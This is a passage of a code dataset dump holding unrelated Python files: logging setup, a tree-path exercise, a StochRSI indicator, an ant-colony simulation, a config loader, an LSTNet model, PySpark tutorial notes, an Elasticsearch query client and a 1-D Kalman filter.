filename))\r\n hand = logging.handlers.TimedRotatingFileHandler(logfile, when=\"h\", interval=1, backupCount=10, encoding=None,\r\n delay=False, utc=False, atTime=None)\r\n #form = logging.Formatter('%(asctime)s %(processName)-10s %(name)s %(levelname)-8s %(message)s')\r\n form = logging.Formatter('%(asctime)s %(processName)-10s %(levelname)-8s %(message)s')\r\n hand.setFormatter(form)\r\n root.addHandler(hand)\r\n\r\n\r\ndef listener_process(queue, configurer, name):\r\n configurer(name)\r\n while True:\r\n try:\r\n record = queue.get()\r\n if record is None:\r\n break\r\n logger = logging.getLogger(record.name)\r\n logger.handle(record)\r\n except Exception:\r\n import sys, traceback\r\n print(\"Whoops! Problem: \", file=sys.stderr)\r\n traceback.print_exc(file=sys.stderr)\r\n\r\n\r\ndef worker_configurer(queue):\r\n hand = logging.handlers.QueueHandler(queue) # Just the one handler needed\r\n root = logging.getLogger()\r\n root.addHandler(hand)\r\n root.setLevel(logging.DEBUG)\r\n\r\n\r\ndef worker_process(queue, configurer):\r\n configurer(queue)\r\n name = multiprocessing.current_process().name\r\n\r\n\r\ndef main():\r\n queue = multiprocessing.Queue(-1)\r\n listener = multiprocessing.Process(target=listener_process, args=(queue, listener_configurer, \"duh\"))\r\n listener.start()\r\n listener.join()\r\n\r\n\r\n# Run as Script when called as Main ***********************************************************************************\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n\r\n\r\n\r\n","sub_path":"mauehome/mplog.py","file_name":"mplog.py","file_ext":"py","file_size_in_byte":4195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"125669050","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 2 17:58:53 2018\n\n@author: owen\n\"\"\"\n\n# Given a binary tree, find the maximum path sum << from root>>.\n# The path may end at any node in the tree and contain at least one node in it.\n\n# 从root出发的路径,左右只选一条,节点值可能为负\n\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\n\n#class Solution:\n# \"\"\"\n# @param root: the root of binary tree.\n# @return: An integer\n# \"\"\"\n# def maxPathSum2(self, root):\n# # write your code here\n# if not root:\n# return 0\n# \n# # Notice! node.val may be negative\n# return root.val + max(0, self.maxPathSum2(root.left), self.maxPathSum2(root.right))\n \nclass Solution:\n \"\"\"\n @param root: the root of binary tree.\n @return: An integer\n \"\"\"\n def maxPathSum2(self, root):\n # write your code here\n # DFS\n def dfs(node, curr):\n curr += node.val\n self.res = max(self.res, curr)\n if node.left:\n dfs(node.left, curr)\n if node.right:\n dfs(node.right, curr)\n \n \n if not root:\n return 0\n \n self.res = float('-inf')\n dfs(root, 0)\n return self.res\n \n \nif __name__==\"__main__\":\n root = TreeNode(-1)\n root.left = TreeNode(-2)\n root.right = TreeNode(-4)\n print(Solution().maxPathSum2(root))\n \n root = TreeNode(1)\n root.left = TreeNode(2)\n root.right = TreeNode(4)\n print(Solution().maxPathSum2(root))\n","sub_path":"Binary Tree Maximum Path Sum II.py","file_name":"Binary Tree Maximum Path Sum II.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"547740155","text":"from __future__ import absolute_import\nimport numpy as np\nfrom pyti.function_helper import fill_for_noncomputable_vals\nfrom pyti.relative_strength_index import RSI\nfrom pyti.relative_strength_index import relative_strength_index\nfrom six.moves import range\n\nclass STOCHRSI(RSI):\n def __init__(self, data, period):\n super().__init__(data, period)\n self.stochrsi = stochrsi(data, period)\n\n def get_new_stochrsi(self, data, commit=False):\n range_rsi = None\n new_rsi = super().get_new_rsi(data, commit)\n range_rsi = np.concatenate((self.rsi[-self.period+1:], np.array([new_rsi])), axis=0)\n new_stochrsi = 100 * ((new_rsi - np.min(range_rsi)) / (\n np.max(range_rsi) - np.min(range_rsi)))\n return new_stochrsi\n\ndef stochrsi(data, period):\n \"\"\"\n StochRSI.\n\n Formula:\n SRSI = ((RSIt - RSI LOW) / (RSI HIGH - LOW RSI)) * 100\n \"\"\"\n rsi = relative_strength_index(data, period)\n stochrsi = [100 * ((rsi[idx] - np.min(rsi[idx + 1 - period:idx + 1])) / (\n np.max(rsi[idx + 1 - period:idx + 1]) - np.min(rsi[idx + 1 - period:idx + 1]))) for idx in\n range(period - 1, len(rsi))]\n stochrsi = fill_for_noncomputable_vals(data, stochrsi)\n return stochrsi","sub_path":"pyti/stochrsi.py","file_name":"stochrsi.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"505060232","text":"import random\nimport math\nimport copy\nfrom util import *\nclass Ant:\n def __init__(self, boardWidth, boardHeight, knowledge, genome, x=2, y=2):\n self.uuid = random.randint(0, 999999999999)\n self.x = x\n self.y = y\n self.boardWidth = boardWidth\n self.boardHeight = boardHeight\n self.state = AntState.EXPLORE\n self.knowledge = knowledge\n self.hasFood = False\n self.visitedOnThisTrip = []\n self.goalPoint = []\n self.pathBackToBase = []\n self.maxHealth = genome[\"startingHealth\"]\n self.maxHunger = genome[\"startingHunger\"]\n self.health = self.maxHealth\n self.hunger = self.maxHunger\n self.genome = genome\n self.name = randomName()\n\n def updateKnowledge(self, selectionArgs):\n antBoard = selectionArgs[\"board\"]\n for key in antBoard.keys():\n if antBoard[key] == State.FOOD and not key.split(',') in self.knowledge[\"food\"]:\n self.knowledge[\"food\"].append([int(k) for k in key.split(',')])\n if antBoard[key] == State.COLONY and self.knowledge[\"enemyColony\"] == [] and self.knowledge[\"homeColony\"] != [int(k) for k in key.split(',')]:\n self.knowledge[\"enemyColony\"] = [int(k) for k in key.split(',')]\n if ([self.x, self.y] in self.knowledge[\"food\"]):\n # self.knowledge[\"food\"].remove([self.x, self.y])\n self.knowledge[\"food\"] = removeValuesFromList(self.knowledge[\"food\"], [self.x, self.y])\n def reorderMoves(self, oldMoves, newMoveOrder):\n newMoves = []\n for move in newMoveOrder:\n if move in oldMoves:\n newMoves.append(move)\n return newMoves\n def sortMoves(self, moves, location, moveAwayFrom):\n vector = [location[0]-moveAwayFrom[0], location[1]-moveAwayFrom[1]]\n moveOrder = []\n if (abs(vector[0]) > abs(vector[1])):\n # East/West is more important than North/South\n if (vector[0] > 0):\n if (vector[1] > 0):\n moveOrder = ['E', 'N', 'S', 'W']\n else:\n moveOrder = ['E', 'S', 'N', 'W']\n else:\n if (vector[1] > 0):\n moveOrder = ['W', 'N', 'S', 'E']\n else:\n moveOrder = ['W', 'S', 'N', 'E']\n else:\n if (vector[1] > 0):\n if (vector[0] > 0):\n moveOrder = ['N', 'E', 'W', 'S']\n else:\n moveOrder = ['N', 'W', 'E', 'S']\n else:\n if (vector[0] > 0):\n moveOrder = ['S', 'E', 'W', 'N']\n else:\n moveOrder = ['S', 'W', 'E', 'N']\n return self.reorderMoves(moves, moveOrder)\n\n def generateGoalPoint(self):\n self.goalPoint = [random.randint(0, self.boardWidth-1), random.randint(0, self.boardHeight-1)]\n def selectAction(self, selectionArgs):\n antBoard = selectionArgs[\"board\"]\n enemyCol = self.knowledge[\"enemyColony\"]\n homeCol = self.knowledge[\"homeColony\"]\n action = \"\"\n self.transitionStates(antBoard)\n log(\"My state is \" + str(self.state))\n if self.state == AntState.EXPLORE:\n if (self.goalPoint == [] or (self.x == self.goalPoint[0] and self.y == self.goalPoint[1])):\n self.generateGoalPoint()\n log(\"I'm exploring towards \" + str(self.goalPoint) + \". Currently at \" + str([self.x, self.y]))\n action = self.moveTowards(self.goalPoint, antBoard, tunnelsOnly=False)\n # # Should this just be random out of just dirt or all?\n # moves = self.getValidMoves()\n # # random.shuffle(moves)\n # moves = self.sortMoves(moves, [self.x, self.y], homeCol)\n # action = random.choice(self.getValidMoves())\n # for move in moves:\n # pos = getNewPosition([self.x, self.y], move)\n # strPos = str(pos[0]) + \",\" + str(pos[1])\n # if strPos in antBoard: # and antBoard[strPos] == State.DIRT:\n # action = move\n # break\n elif self.state == AntState.FIGHTANT:\n action = 'E' #Should be direction of ant\n elif self.state == AntState.FIGHTCOLONY:\n enemyCol = self.knowledge[\"enemyColony\"]\n if enemyCol == []:\n print(\"I was told to attack the enemy colony, but I don't know where it is\")\n action = random.choice(self.getValidMoves())\n else:\n action = self.moveTowards(enemyCol, antBoard, backtrack=False)\n elif self.state == AntState.GETFOOD:\n action = self.moveTowards(self.getClosestFood(), antBoard, tunnelsOnly=False)\n elif self.state == AntState.RETURNTOBASE:\n if len(self.pathBackToBase) == 0:\n action = random.choice(self.getValidMoves())\n else:\n action = self.pathBackToBase.pop()\n # action = self.moveTowards(homeCol, antBoard, backtrack=False)\n # action = self.moveTowards(homeCol, antBoard, tunnelsOnly=False)\n # Move to function\n if self.state != AntState.RETURNTOBASE:\n if action == 'N':\n actionBack = 'S'\n if action == 'S':\n actionBack = 'N'\n if action == 'W':\n actionBack = 'E'\n if action == 'E':\n actionBack = 'W'\n self.pathBackToBase.append(actionBack)\n # log(\"My path back is \" + str(self.pathBackToBase))\n return action\n\n def transitionStates(self, antBoard):\n if self.state == AntState.EXPLORE:\n if (len(self.knowledge[\"food\"]) > 0):\n self.state = AntState.GETFOOD\n elif (self.shouldRetreat()):\n self.visitedOnThisTrip = []\n self.state = AntState.RETURNTOBASE\n elif(self.knowledge[\"enemyColony\"] != []):\n self.state = AntState.FIGHTCOLONY\n elif self.state == AntState.FIGHTANT:\n if (self.shouldRetreat()):\n self.visitedOnThisTrip = []\n self.state = AntState.RETURNTOBASE\n elif self.state == AntState.FIGHTCOLONY:\n if (self.shouldRetreat()):\n self.visitedOnThisTrip = []\n self.state = AntState.RETURNTOBASE\n elif self.state == AntState.GETFOOD:\n if (self.hasFood):\n self.visitedOnThisTrip = []\n self.state = AntState.RETURNTOBASE\n elif (len(self.knowledge[\"food\"]) == 0):\n self.state = AntState.EXPLORE\n elif self.state == AntState.RETURNTOBASE:\n if (len(self.pathBackToBase) == 0 or (self.x == self.knowledge['homeColony'][0] and self.y == self.knowledge['homeColony'][1])):\n self.state = AntState.EXPLORE if len(self.knowledge['food']) == 0 else AntState.GETFOOD\n\n def shouldRetreat(self):\n # Later on, this should involve random mutations. For now, just go back when you should\n # distToCol = (self.x - self.knowledge[\"homeColony\"][0]) + (self.y - self.knowledge[\"homeColony\"][1])\n return self.health < self.maxHealth\n\n def getClosestFood(self):\n closestFood = []\n closestDist = 999999999999\n for food in self.knowledge[\"food\"]:\n dist = abs(food[0]-self.x) + abs(food[1]-self.y)\n if dist < closestDist:\n closestDist = dist\n closestFood = copy.copy(food)\n return closestFood\n\n\n def moveTowards(self, newLocation, antBoard, tunnelsOnly=True, backtrack = True):\n validMoves = self.getValidMoves()\n if 'W' in validMoves and not (newLocation[0] < self.x):\n validMoves.remove('W')\n if 'E' in validMoves and not (newLocation[0] > self.x):\n validMoves.remove('E')\n if 'S' in validMoves and not (newLocation[1] < self.y):\n validMoves.remove('S')\n if 'N' in validMoves and not (newLocation[1] > self.y):\n validMoves.remove('N')\n if len(validMoves) > 0:\n random.shuffle(validMoves)\n for move in validMoves:\n [newx, newy] = getNewPosition([self.x, self.y], move)\n posString = str(newx) + \",\" + str(newy)\n if posString in antBoard and (antBoard[posString] == State.EMPTY or antBoard[posString] == State.COLONY):\n if backtrack or posString not in self.visitedOnThisTrip:\n self.visitedOnThisTrip.append(posString)\n return move\n if (validMoves == []):\n # There really should be a better solution than juts randomly moving.\n validMoves = self.getValidMoves()\n if (tunnelsOnly):\n #This can get stuck\n #do over, but don't try to go towards the goal at all\n #this code was copied from above (refactor?)\n validMoves = self.getValidMoves()\n random.shuffle(validMoves)\n for move in validMoves:\n [newx, newy] = getNewPosition([self.x, self.y], move)\n posString = str(newx) + \",\" + str(newy)\n if posString in antBoard and (antBoard[posString] == State.EMPTY or antBoard[posString] == State.COLONY):\n if backtrack or posString not in self.visitedOnThisTrip:\n self.visitedOnThisTrip.append(posString)\n return move\n\n return random.choice(validMoves)\n\n def getValidMoves(self):\n moves = []\n if self.x > 0:\n moves.append('W')\n # Am I off by one here?\n if self.x < self.boardWidth:\n moves.append('E')\n if self.y > 0:\n moves.append('S')\n if self.y < self.boardHeight:\n moves.append('N')\n return moves\n\n","sub_path":"ant.py","file_name":"ant.py","file_ext":"py","file_size_in_byte":9925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"442118355","text":"import os\nimport yaml\n\n\nclass Configuration(object):\n \"\"\"Loads a yaml configuration file.\"\"\"\n\n def __init__(self):\n self.config = self.load()\n\n def _get(self, key_components):\n \"\"\"Low-level method to look up a key in a dictionary.\"\"\"\n value = self.config\n for k in key_components:\n value = value[k]\n return value\n\n def get(self, key, default=None):\n \"\"\"Get the configuration for a specific variable, using dots as\n delimiters for nested objects.\n :param key: Key in the config to lookup\n :type key: str\n :param default: Default value to return if key is not in the config.\n :type default: str\n \"\"\"\n key_components = key.split('.')\n try:\n return self._get(key_components)\n except KeyError:\n return default\n\n def load(self):\n \"\"\"Loads the configuration file.\"\"\"\n if os.environ.get('ENVIRONMENT') == 'production':\n env_path = 'config/production.yaml'\n else:\n env_path = os.environ.get('CONFIG_ENV') or 'config/dev.yaml'\n if not os.path.exists(env_path):\n raise Exception('{0} does not exist'.format(env_path))\n\n stream = open(env_path, 'r')\n return yaml.safe_load(stream)\n\n\nconfig = Configuration()\n","sub_path":"xword/utils/configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"237870434","text":"import mxnet as mx\nfrom mxnet import nd, gluon, autograd\nfrom mxnet.gluon import nn, rnn\n\nclass LSTNet(gluon.Block):\n \"\"\"\n LSTNet auto-regressive block\n \"\"\"\n def __init__(self, num_series, conv_hid, gru_hid, skip_gru_hid, skip, ar_window):\n super(LSTNet, self).__init__()\n kernel_size = 6\n dropout_rate = 0.2\n self.skip = skip\n self.ar_window = ar_window\n with self.name_scope():\n self.conv = nn.Conv1D(conv_hid, kernel_size=kernel_size, layout='NCW', activation='relu')\n self.dropout = nn.Dropout(dropout_rate)\n self.gru = rnn.GRU(gru_hid, layout='TNC')\n self.skip_gru = rnn.GRU(skip_gru_hid, layout='TNC')\n self.fc = nn.Dense(num_series)\n self.ar_fc = nn.Dense(1)\n\n def forward(self, x):\n \"\"\"\n :param nd.NDArray x: input data in NTC layout (N: batch-size, T: sequence len, C: channels)\n :return: output of LSTNet in NC layout\n :rtype nd.NDArray\n \"\"\"\n # Convolution\n c = self.conv(x.transpose((0, 2, 1))) # Transpose NTC to to NCT (a.k.a NCW) before convolution\n c = self.dropout(c)\n\n # GRU\n r = self.gru(c.transpose((2, 0, 1))) # Transpose NCT to TNC before GRU\n r = r[-1] # Only keep the last output\n r = self.dropout(r) # Now in NC layout\n\n # Skip GRU\n # Slice off multiples of skip from convolution output\n skip_c = c[:, :, -(c.shape[2] // self.skip) * self.skip:]\n skip_c = skip_c.reshape((c.shape[0], c.shape[1], -1, self.skip)) # Reshape to NCT x skip\n skip_c = skip_c.transpose((2, 0, 3, 1)) # Transpose to T x N x skip x C\n skip_c = skip_c.reshape((skip_c.shape[0], -1, skip_c.shape[3])) # Reshape to Tx (Nxskip) x C\n s = self.skip_gru(skip_c)\n s = s[-1] # Only keep the last output (now in (Nxskip) x C layout)\n s = s.reshape((x.shape[0], -1)) # Now in N x (skipxC) layout\n\n # FC layer\n fc = self.fc(nd.concat(r, s)) # NC layout\n\n # Autoregressive highway\n ar_x = x[:, -self.ar_window:, :] # NTC layout\n ar_x = ar_x.transpose((0, 2, 1)) # NCT layout\n ar_x = ar_x.reshape((-1, ar_x.shape[2])) # (NC) x T layout\n ar = self.ar_fc(ar_x)\n ar = ar.reshape((x.shape[0], -1)) # NC layout\n\n # Add autoregressive and fc outputs\n res = fc + ar\n return res\n","sub_path":"lab4_2_lstnet_distributed_multi_gpu/lstnet.py","file_name":"lstnet.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"363283480","text":"import json\nfilepath = r'C:\\Users\\huayu\\Desktop\\python-exercise\\10.4\\num.txt'\ntry:\n with open(filepath) as file_object:\n num = json.load(file_object)\n print(\"I know your favorite number is :\" + num)\nexcept FileNotFoundError:\n num = input(\"please enter a number: \")\n with open(filepath, 'w') as file_object:\n json.dump(num, file_object)","sub_path":"10.文件和异常/10.4/load_dump.py","file_name":"load_dump.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"273247948","text":"from parla import Parla\nfrom parla.cpu import cpu\nfrom parla.tasks import spawn, TaskSpace\n\ndef different_taskspace_dependency():\n first_task = TaskSpace(\"FirstTask\")\n @spawn(first_task, memory=2000)\n def t0():\n print(\"\\tTask[0]\")\n\n # Spawns a task on the different task space\n # from the first task which is dependent on\n # the first task.\n second_task = TaskSpace(\"SecondTask\")\n @spawn(second_task, [first_task])\n def t1():\n print(\"\\tTask[1]\")\n # Return the last task.\n return second_task\n\nif __name__ == \"__main__\":\n with Parla():\n print(\"Two simple tasks started\")\n different_taskspace_dependency()\n","sub_path":"examples/simple/simple_two_tasks.py","file_name":"simple_two_tasks.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"74771579","text":"import findspark\nfindspark.init('/home/dienbui/spark-2.2.0-bin-hadoop2.7')\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.types import StructField, StringType, IntegerType, StructType\nfrom pyspark.sql.functions import countDistinct, avg, stddev, format_number, mean\nfrom pyspark.sql.functions import (dayofmonth, dayofyear,\n hour, month,\n year, weekofyear,\n format_number, date_format)\n\nspark = SparkSession.builder.appName('Basics').getOrCreate()\ndf = spark.read.json('people.json')\ndf.show()\ndf.printSchema()\ndf.columns\ndf.describe()\ndf.describe().show()\n\ndata_schema = [StructField('age', IntegerType(), True),\n StructField('name', StringType(), True)]\nfinal_struct = StructType(fields=data_schema)\ndf = spark.read.json('people.json', schema=final_struct)\ndf.printSchema()\n\nprint(df['age'])\nprint(type(df['age']))\nprint(df.select('age'))\ndf.select('age').show()\ndf.head(2)\ndf.select(['age', 'name']).show()\n\ndf.withColumn(('newage'), df['age']).show()\ndf.withColumn('double_age', df['age'] * 2).show()\ndf.createOrReplaceTempView('people')\nresults = spark.sql('SELECT * FROM people').show()\nnew_result = spark.sql('SELECT * FROM people where age = 30').show()\n\n# BASIC OPERATIONS\n\ndf = spark.read.csv('appl_stock.csv', inferSchema=True, header=True)\ndf.filter('Close < 500').show()\ndf.filter('Close < 500').select('Open').show()\ndf.filter(df['Close'] < 500).select('Volume').show()\ndf.filter((df['Close'] < 200) & (df['Open'] > 200)).show()\nresult = df.filter(df['Low'] == 197.16).collect()\nrow = result[0]\nrow.asDict()\n\n# GROUPBY AND AGGREGATE\n\ndf.groupBy('Company').mean().show()\n# +-------+-----------------+\n# |Company| avg(Sales)|\n# +-------+-----------------+\n# | APPL| 370.0|\n# | GOOG| 220.0|\n# | FB| 610.0|\n# | MSFT|322.3333333333333|\n# +-------+-----------------+\n\ndf.groupBy('Company').sum().show()\ndf.groupBy('Company').min().show()\ndf.groupBy('Company').max().show()\ndf.groupBy('Company').count().show()\n\ndf.agg({'Sales': 'sum'}).show()\n# +----------+\n# |sum(Sales)|\n# +----------+\n# | 4327.0|\n# +----------+\n\ngroup_data = df.groupBy('Company')\ngroup_data.agg({'Sales': 'max'}).show()\n# +-------+----------+\n# |Company|max(Sales)|\n# +-------+----------+\n# | APPL| 750.0|\n# | GOOG| 340.0|\n# | FB| 870.0|\n# | MSFT| 600.0|\n# +-------+----------+\n\ndf.select(countDistinct('Sales')).show()\n# +---------------------+\n# |count(DISTINCT Sales)|\n# +---------------------+\n# | 11|\n# +---------------------+\n\ndf.select(avg('Sales').alias('Average Sales')).show()\n# +-----------------+\n# | Average Sales|\n# +-----------------+\n# |360.5833333333333|\n# +-----------------+\n\ndf.select(stddev('Sales')).show()\n# +------------------+\n# |stddev_samp(Sales)|\n# +------------------+\n# |250.08742410799007|\n# +------------------+\n\n\nsales_std = df.select(stddev('Sales'))\nsales_std.select(format_number('std', 2)).show()\n# +---------------------+\n# |format_number(std, 2)|\n# +---------------------+\n# | 250.09|\n# +---------------------+\n\ndf.orderBy('Sales').show()\n# +-------+-------+-----+\n# |Company| Person|Sales|\n# +-------+-------+-----+\n# | GOOG|Charlie|120.0|\n# | MSFT| Amy|124.0|\n# | APPL| Linda|130.0|\n# | GOOG| Sam|200.0|\n# | MSFT|Vanessa|243.0|\n# | APPL| John|250.0|\n# | GOOG| Frank|340.0|\n# | FB| Sarah|350.0|\n# | APPL| Chris|350.0|\n# | MSFT| Tina|600.0|\n# | APPL| Mike|750.0|\n# | FB| Carl|870.0|\n# +-------+-------+-----+\n\ndf.orderBy(df['Sales'].desc()).show()\n# +-------+-------+-----+\n# |Company| Person|Sales|\n# +-------+-------+-----+\n# | FB| Carl|870.0|\n# | APPL| Mike|750.0|\n# | MSFT| Tina|600.0|\n# | FB| Sarah|350.0|\n# | APPL| Chris|350.0|\n# | GOOG| Frank|340.0|\n# | APPL| John|250.0|\n# | MSFT|Vanessa|243.0|\n# | GOOG| Sam|200.0|\n# | APPL| Linda|130.0|\n# | MSFT| Amy|124.0|\n# | GOOG|Charlie|120.0|\n# +-------+-------+-----+\n\n# MISSING DATA\n\n# Display rows with at least 2 non-null values\ndf.na.drop(thresh=2).show()\n# get rows with no null value\ndf.na.drop(how='any').show()\n# don't drop any row\ndf.na.drop(how='all').show()\n# drop row will null data in Sales\ndf.na.drop(subset=['Sales']).show()\n# Fill in any string value\ndf.na.fill('FILL VALUE').show()\n# Fill in any null num value\ndf.na.fill(0).show()\n# Fill all null in Name column\ndf.na.fill('No Name', subset=['Name']).show()\n\nmean_val = df.select(mean(df['Sales'])).collect()\nmean_sales = mean_val[0][0]\ndf.na.fill(mean_sales, subset=['Sales']).show()\n\n# TIMESTAMP\n\ndf.select(dayofmonth(df['Date'])).show()\n","sub_path":"dataframe_part_1/data_frame.py","file_name":"data_frame.py","file_ext":"py","file_size_in_byte":4704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"466134967","text":"from elasticsearch import Elasticsearch\nfrom elasticsearch_dsl import query, aggs, function\nimport logging\nimport time\n\n\n# 查询参数结构体\nclass Parameter(object):\n def __init__(self):\n self.query = dict()\n self.query['exact_query'] = False\n self.set_order('__connectTime','desc')\n\n def list_all_members(self):\n for name,value in vars(self).items():\n print('%s=%s'%(name,value))\n\n def return_all_members(self):\n L = []\n for name,value in vars(self).items():\n L.append('%s=%s'%(name,value))\n return L\n\n def set_time(self, begin, end, time_format=None):\n # 输入时间段、时间格式,时间格式默认为yyyy-MM-dd\n self.query['begin_time'] = begin\n self.query['end_time'] = end\n self.query['format'] = 'yyyy-MM-dd'\n if format is not None:\n self.query['time_format'] = time_format\n self.query['exact_query'] = False\n\n def set_from_size(self, from_, size):\n self.query['from'] = from_\n self.query['size'] = size\n\n def set_match_str(self, qstr):\n # 输入查询语句框内查询内容\n self.query['match_str'] = qstr\n\n def set_order(self, order, orderType):\n \"\"\"\n 当前有按挖掘时间 和 默认 相关度打分模式\n :param order: 按时间填写字符串 __connectTime, 默认填写 __bornTime\n :return:\n \"\"\"\n self.query['order'] = order\n self.query['orderType'] = orderType\n\n # 行为分类#http,im,netdisk,email,filetransfer,other,csmp,docaudit,website\n def set_actionType(self,actionType):\n self.query['__actionType'] = actionType\n\n # 平台\n def set_platform(self,platform):\n self.query['__platform'] = platform\n\n\n def set_industry(self, industry):\n # 输入行业名称,参数为list格式\n if isinstance(industry, list) is False:\n print(\"industry input must be list!!\")\n self.query['industry'] = industry\n\n def set_document(self, document):\n # 输入版式名称\n self.query['document'] = document\n\n def set_security(self, security):\n # 输入密级\n self.query['security'] = security\n\n def set_alarm_key(self, alarmkey):\n # 输入关键词,参数为list\n if isinstance(alarmkey, list) is False:\n print(\"alarmkey input must be list\")\n self.query['alarmKey'] = alarmkey\n\n def set_exact_query(self, exact_query):\n # 输入是否是精确语法查找,是为true,否为false\n self.query['exact_query'] = exact_query\n\n def set_extention(self, extention):\n # 输入扩展名\n self.query['extention'] = extention\n\nclass ESClient(object):\n def __init__(self, hosts, log):\n self.es = Elasticsearch(hosts=hosts)\n\n self.log = log\n\n def search_yth_base(self, params):\n self.log.debug('进入 search_yth_base 函数,%s'%params.return_all_members())\n\n # #####################过滤条件###############################\n filter_query = query.MatchAll()\n # 日期\n date_query = query.Range(_expand__to_dot=False, __connectTime={\n 'gte': params.query['begin_time'],\n 'lte': params.query['end_time'], 'format': params.query['format']})\n filter_query = filter_query & date_query\n\n # 行为分类\n if '__actionType' in params.query:\n filter_query = filter_query & query.Term(_expand__to_dot=False,\n __actionType=params.query['__actionType'])\n\n\n\n # #####################查询条件###############################\n match_query = query.MatchAll()\n if 'match_str' in params.query:\n qs = params.query['match_str']\n if params.query['exact_query']:\n qs = '\\\"' + qs + '\\\"'\n highlight_query = match_query & query.QueryString(\n default_field=\"__full_query\",\n query=qs\n )\n match_query = match_query & (\n query.QueryString(\n default_field=\"__full_query\",\n query=qs\n ) | query.QueryString(\n default_field=\"__summary\",\n query=qs\n )\n )\n\n # #####################高亮内容###############################\n highlight = {\n \"pre_tags\": [\n \"\"\n ],\n \"post_tags\": [\n \"\"\n ],\n \"fields\": {\n \"__summary\": {\n \"highlight_query\": highlight_query.to_dict()\n }\n }\n }\n\n # #####################聚合内容###############################\n actionType_agg = aggs.Filter(query.Bool(must_not=query.Match(_expand__to_dot=False, __actionType='')))\n actionType_agg.bucket('actionType', 'terms', field='__actionType', size=30)\n\n\n # 查询语句\n all_query = {\n \"bool\": {\n \"must\": match_query.to_dict(),\n \"filter\": filter_query.to_dict()\n }\n }\n\n # 排序 按接入时间或采集时间排序\n sort = []\n if 'sort' in parameter.query:\n if parameter.query['order'] == '__connectTime':\n self.log.debug('按接入时间排序')\n sort = [\n {\n \"__connectTime\": {\n \"order\": parameter.query['orderType']\n }\n }]\n elif parameter.query['order'] == '__bornTime':\n self.log.debug('按采集时间排序')\n sort = [\n {\n \"__bornTime\": {\n \"order\": parameter.query['orderType']\n }\n }]\n\n\n # 查询、聚合,总体组合\n body = {\n \"aggs\": {\n \"actionType_agg\": actionType_agg.to_dict()\n },\n \"query\": all_query,\n 'sort': sort,\n \"highlight\": highlight\n }\n self.log.debug('使用查询语句:{0},从es中搜索数据'.format(body))\n return self.es.search('yth_base', 'mytype', body,\n size=parameter.query['size'],\n from_=parameter.query['from']\n )\n\n\n\nif __name__ == '__main__':\n log_file = \"./es_logger.log.py\"\n logging.basicConfig(filename=log_file, level=logging.DEBUG)\n es_client = ESClient('192.168.10.136:9200', logging)\n parameter = Parameter()\n parameter.set_match_str('国家保密局')\n parameter.set_time('2019-05-16', '2019-05-21')\n parameter.set_from_size(0, 10)\n print(parameter.return_all_members())\n print(es_client.search_yth_base(parameter))\n","sub_path":"_bak/es_test.py","file_name":"es_test.py","file_ext":"py","file_size_in_byte":6982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"154938998","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue May 10 14:39:48 2016\r\n\r\n@author: Oos\r\n\"\"\"\r\n\r\n\"\"\"kaymna filter 1 D starts\"\"\"\r\n\r\ndef update(mean1, var1, mean2, var2):\r\n new_mean = float(var2 * mean1 + var1 * mean2) / (var1 + var2)\r\n new_var = 1./(1./var1 + 1./var2)\r\n return [new_mean, new_var]\r\n\r\ndef predict(mean1, var1, mean2, var2):\r\n new_mean = mean1 + mean2\r\n new_var = var1 + var2\r\n return [new_mean, new_var]\r\n\r\nmeasurements = [5., 6., 7., 9., 10.]\r\nmotion = [1., 1., 2., 1., 1.]\r\nmeasurement_sig = 4.\r\nmotion_sig = 2.\r\nmu = 0.\r\nsig = 10000.\r\n\r\n#Please print out ONLY the final values of the mean\r\n#and the variance in a list [mu, sig]. \r\n\r\nfor step in range(len(motion)):\r\n mu, sig = update(mu, sig, measurements[step], measurement_sig)\r\n mu, sig = predict(mu, sig, motion[step], motion_sig)\r\n\r\nprint [mu, sig]\r\n\r\n\"\"\"kaymna filter 1 D ends\"\"\"","sub_path":"update vairance and mean for move and sens.py","file_name":"update vairance and mean for move and sens.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"213665562","text":"import argparse\n# from operator import itemgetter\n# from itertools import groupby\n# from Bio import AlignIO\n# from Bio.Alphabet import generic_dna\n# from Bio.Align import MultipleSeqAlignment\n# from Bio.Nexus import Nexus\n\n\n\n#set up the arguments parser to deal with the command line input\nparser = argparse.ArgumentParser(description = \"Categorises SNPs to include or exclude based on whether they fall within the boundaries file and outputs these to file. Also, spits out a new alignment reduced to the 'include' sites for downstream processing.\")\nparser.add_argument('-s', '--site_boundaries', help = \"site boundaries file, csv. each row contains sxxxxxtoyyyy\", required = True)\nparser.add_argument('-o', '--output_prefix', help = \"prefix to be placed in file name\", required = True)\n\nargs = parser.parse_args()\n\n\n\n#iunsert the list here\ndef get_unique(boundaries, prefix):\n\twith open(boundaries) as input_handle:\n\t\tblocks_sig = [line.rstrip(\"\\n\") for line in input_handle]\n\t\tblocks_sig_conv = []\n\t\tblocks_sig_int = []\n\t\tfor i in blocks_sig:\n\t\t\tx = 